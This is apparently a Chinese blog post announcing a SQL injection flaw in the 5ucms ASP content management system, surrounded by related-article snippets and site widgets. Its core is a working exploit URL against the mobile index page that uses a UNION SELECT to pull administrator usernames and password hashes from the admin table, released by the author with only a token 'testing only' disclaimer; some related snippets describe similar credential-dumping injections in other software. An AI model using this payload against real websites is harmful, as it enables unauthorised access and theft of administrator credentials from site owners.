5ucms 最新版 sql 注入漏洞

最新推荐文章于 2015-10-09 21:40:29 发布
最新推荐文章于 2015-10-09 21:40:29 发布
阅读量698 收藏
点赞数
分类专栏: CMS 提权 文章标签: sql 测试
提权 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
CMS
21 篇文章 0 订阅
订阅专栏

20120606183325.jpg

漏洞EXP↓ 

/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin

放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用。

fengling132
关注
专栏目录
5U网络文章管理系统(5UCMS) 3.2012.0625 UTF-8.rar
07-05
5u网站管理系统,是一款国内最专业、使用人数最多、应用范围最广的小型 ASP网站建站系统,适用于中小型企业自主建站,它使用方便快捷 、操作简单 明了、安装部署灵活,并提供海量插件,及各各行业的模板免费下载,seo友 好性强,简约而不简单,可应用于图片站、企业站、文章资迅站、 下载站等等,是企业建站的最好选择。 5uCMS v3.2012.0625更新说明: 更新手机客户端页面参数没有判断导致sql注入漏洞 5uCMS v3.2012.0503更新说明: 新增栏目大类分页标签属性 升级说明:替换inc/class_template.asp 标签说明:新增$cid属性 使用说明: <!--page:{$size=5 $cid=1,2,3}--><!--page-->调用指定栏目ID编号为1、2、3的文章列表 <!--page:{$size=5 $cid={field:childid}}--><!--page-->调用上级栏目下面所有子栏目的文章列表 <!--page:{$size=5}--><!--page-->不加cid属性默认调用终极栏目列表 修复后台登录提示非法请求 升级说明:替换admin/ajax/login.asp 修正自定义模型在编辑以前的文章时不能保存自定义字段数据 升级说明:替换admin/admin_content.asp,admin/inc/class_content.asp,admin/ajax.asp 修正取消文章内容分页在关闭分页功能后以前的文章需要在内容里面取消分页符 升级说明:替换inc/class_content.asp,admin/inc/class_content.asp 增加发布内容每20秒自动保存一次,在发布失败的失败的时候可以恢复内容 升级说明:替换admin/ajax.asp,admin/js/common.js,admin/admin_content.asp和admin/images/ajax.js 修复批量上传时在编辑框里面显示的是图片地址 升级说明:替换admin/update.asp 修复插件不能安装和卸载 升级说明:替换admin/images/ajax.js,admin/admin_plus.asp
5UCMS漏洞利用
收集盒 Book box
07-06 1129
有一次不小心发现了5UCMS一个小漏洞漏洞文件后台目录/ajax.asp因未进行后台用户验证,导致未登陆也可访问此文件,文件存在sql注入。我今天进官方看了下好象漏洞他们已经发出了修复公告了,这里我把利用公布出来 直接暴出后台帐号密码。ajax.asp?Ac
AnyMacro邮件系统SQL注入漏洞和XSS漏洞
kingjxust的专栏
01-22 3845
AnyMacro邮件系统在早期版本的用户登录处存在SQL注入漏洞,通过漏洞可爆出用户加密后的密码: 在用户名处输入 ' 号后 将提示错误: Query DB [select crypt, status from user where id = '' @mail.doamin.cn'] err:You have an error in your SQL syntax; check the man
anymacro mail 严重漏洞
cnbird's blog
06-19 2981
设置邮件系统管理密码 密  码: 重输密码: class=bgcolor1> Copyright © 2002 Beijing Anymacro Investment Ltd. All Rights Reserved. 北京安宁投资有限公司 版权所有
第一版5UCMS个人博客 V3
04-09
第一版5UCMS个人博客,5UCMS模板
5uCMS CS版 v1.0 UTF-8
12-06
5uCMS CS(ASP UTF-8)版本采用ASP+ACCESS/MSSQL,使用前请在IIS环境下... 5uCMS(无忧内容管理系统)CS版是纯净安装版,为了避免影响速度,没有加任何外部接口。 CS版非常适合企业网站制作,强大的功能特别有利于网站优
5ucms php版 v2.20150903
10-07
5ucms是一款采用PHP开发,THINKPHP为内核,基于HMVC规则开发适合中小企业、公司、新闻、个人等相关行业的网站内容管理。程序具有良好的用户体验用建议的操作,适合美工人员快速建立
5uCMS CS版源代码
03-18
5uCMS CS(ASP UTF-8)版本采用ASP+ACCESS/MSSQL,使用前请在IIS环境下... 5uCMS(无忧内容管理系统)CS版是纯净安装版,为了避免影响速度,没有加任何外部接口。 CS版非常适合企业网站制作,强大的功能特别有利于网站优
5ucms移动端插件(手机版) v1.0
12-05
5ucms移动端插件(手机版)是以5ucms asp版本为核心进行开发的5ucms移动插件,可以使5ucms具备相对应的移动端页面。 闲着没事,花了一会时间写了个5ucms移动端简单手机版。 一个很简单的移动端例子,需要跟多功能的...
5ucms移动端插件(手机版)源代码
03-18
5ucms移动端插件(手机版)是以5ucms asp版本为核心进行开发的5ucms移动插件,可以使5ucms具备相对应的移动端页面。 闲着没事,花了一会时间写了个5ucms移动端简单手机版。 一个很简单的移动端例子,需要跟多功能的...
SQL批量替换工具.rar
08-18
SQL批量替换工具
CMS扫描脚本
08-29
CMS扫描脚本,通过json字典内的数据扫描网站的cms,json文件很全,识别率很高。
无忧CMS(5uCMS)asp网站建站系统v3.2012.0625UTF-8
07-27
5u网站管理系统,是一款国内最专业、使用人数最多、应用范围最广的小型 ASP网站建站系统,适用于中小型企业自主建站,它使用方便快捷 、操作简单 明了、安装部署灵活,并提供海量插件,及各各行业的模板免费下载,seo友 好性强,简约而不简单,可应用于图片站、企业站、文章资迅站、 下载站等等,是企业建站的最好选择。 5uCMS v3.2012.0625更新说明: 更新手机客户端页面参数没有判断导致sql
linweicms邻微CMS微信多用户营销系统免费开源2.2
05-16
linweicms 邻微CMS微信多用户营销系统免费开源。邻微团队不但开源我们还提供技术指导。 邻微论坛让完全不懂技术的个人或企业通过简单的配置,即可拥有强大的功能。 让你体验前所唯有的优质服务。让我们的真诚打动你!!! 我们的服务没有你想不到,邻微团队只会给你带来更多惊喜!!! 企业使用乐享微信可以用低廉的成本实现智能客服机器人功能。 智能回复、微信3G网站、互动营销活动,会员管理,在线订单,数据统计等系 统功能,让您快速搭建微信营销平台,坐等收取会员费!带给你全新的微信互动营销 高级版本五月下旬即将发布, 给你带来不一样的感觉,不一样的体验。 视频教学二次开发即将开课。敬请关注我们的论坛
系统数据库脚本
11-07
系统数据库脚本 
5ucms的FCKeditor编辑器上传图片文件问题
资料汇总整理-仅供个人学习使用
06-11 1615
现在很多CMS系统因为安全原因会把后台编辑器里的上传功能给去除,但这样一来对实际使用过程造成了很多麻烦,今天我们以ASPCMS系统的FCKeditor编辑器为例,说明一下如何增加图片上传功能。 1. 打开网站后台编辑器里的admin/editor/fckconfig.js这个文件 找到FCKConfig.ImageUpload = false 这句,把false改成true就行啦。
密码找回漏洞总结
zaqwescsdn的博客
06-19 2932
概述大部分是乌云知识库中的内容,已经总结的很好了,再按照自己的思路过一遍。 1.伪造请求(未注册的情况下)在请求密码修改的过程中,修改账号的手机或邮箱等联系方式,在接受到验证码后进行密码修改。 OPPO修改任意帐号密码-2 OPPO修改任意帐号密码-3 修改了接受密码手机,并且通过对账户类型的修改绕过边界。2.使用正常账户请求修改获取token 爆破(绕过次数验证) 当当网任意用户密码修改漏洞
最小修改实现5UCMS IF语句的嵌套
12-14 1012
将 inc\class_template.asp 458行的 Parser_IF 函数整体注释掉,改成下面两个函数   Public Function Parser_IF() Dim PreLB PreLB = "" Parser_IF2(PreLB) End Function ' 判断标签 Public Function Parser_IF2(ByVal
5ucms信息源RSS插件代码
资料汇总整理-仅供个人学习使用
10-09 570
新建自定义页面,不使用模板,命名为rss.xml。复制一下代码,加到内容部分就可以了 rss地址就是http://网站地址/rss.xml {sys:webname} - RSS邮件订阅 {sys:httpurl} 标题 网站名称 {sys:httpurl} 邮箱 zh-cn 10 [Rss:aurl] [Rss:titlex] [Rss:aut
5ucms标签使用详细说明
5ucms标签使用说明 5ucms标签使用说明是5ucms系统中的一项重要功能,它提供了多种标签调用方式,帮助用户快速生成动态内容。本文将对5ucms标签使用说明进行详细介绍。 -- 底层标签 — 1. 文章内容标签调用:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值